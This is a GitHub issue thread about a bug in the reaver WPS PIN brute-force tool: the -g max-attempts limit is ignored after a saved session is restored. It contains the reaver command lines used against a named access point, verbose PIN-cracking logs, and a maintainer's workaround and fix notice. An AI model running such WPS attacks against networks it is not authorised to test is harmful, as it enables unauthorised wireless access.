t6x/reaver-wps-fork-t6x #139: --max-attempts ( -g ) does not work correctly

d5244af6a0, 2017-06-01:
It works normally once, the second attempt does not work anymore.
ArchLinux.
**First try**:
reaver -i wlan1mon -b 60:E3:27:61:E8:80 -S -vv -s /root/123.session -w -e "In_E880" **-g 1**

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212 & Wiire & kib0rg

[+] Waiting for beacon from 60:E3:27:61:E8:80
[+] Switching wlan1mon to channel 1
[+] Switching wlan1mon to channel 2
[+] Switching wlan1mon to channel 3
[+] Switching wlan1mon to channel 4
[+] Switching wlan1mon to channel 5
[+] Associated with 60:E3:27:61:E8:80 (ESSID: In_E880)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 1
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] p1_index set to 1
[+] Pin count advanced: 1. Max pin attempts: 1
[+] Quitting after 1 crack attempts
[-] Failed to recover WPA key

**Second try:**
reaver -i wlan1mon -b 60:E3:27:61:E8:80 -S -vv -s /root/123.session -w -e "In_E880" **-g 1**

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212 & Wiire & kib0rg

[+] p1_index set to 1
[+] p2_index set to 0
[+] Restored previous session
[+] Waiting for beacon from 60:E3:27:61:E8:80
[+] Switching wlan1mon to channel 5
[+] Associated with 60:E3:27:61:E8:80 (ESSID: In_E880)
[+] Starting Cracking Session. Pin count: 1, Max pin attempts: 1
[+] Trying pin 00005678.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] p1_index set to 2
[+] Pin count advanced: 2. Max pin attempts: 1
[+] Trying pin 01235678.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] p1_index set to 3
[+] Pin count advanced: 3. Max pin attempts: 1
[+] Trying pin 11115670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] p1_index set to 4
[+] Pin count advanced: 4. Max pin attempts: 1
[+] Trying pin 22225672.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
^C
[+] Session saved.

kcdtv, 2017-06-09:
The option -p was originally thought to be used just once and with no saving session. 
For me neither it is very clear in the description but that "was the spirit"
For the moment there are still  issues to be solved with -g option : 
  [issue50](https://github.com/t6x/reaver-wps-fork-t6x/issues/50)
  [issue111](https://github.com/t6x/reaver-wps-fork-t6x/issues/111 )
Sorry for the poor quality of this answer:  As a walk around you can add some delay beetwen PIN using -d option to have time to press ctrl+c before another PIN is sent.

kcdtv, 2017-06-21:
issue is solved from **reaver 1.6b** (actual main branch)

closed 2017-06-21 by kcdtv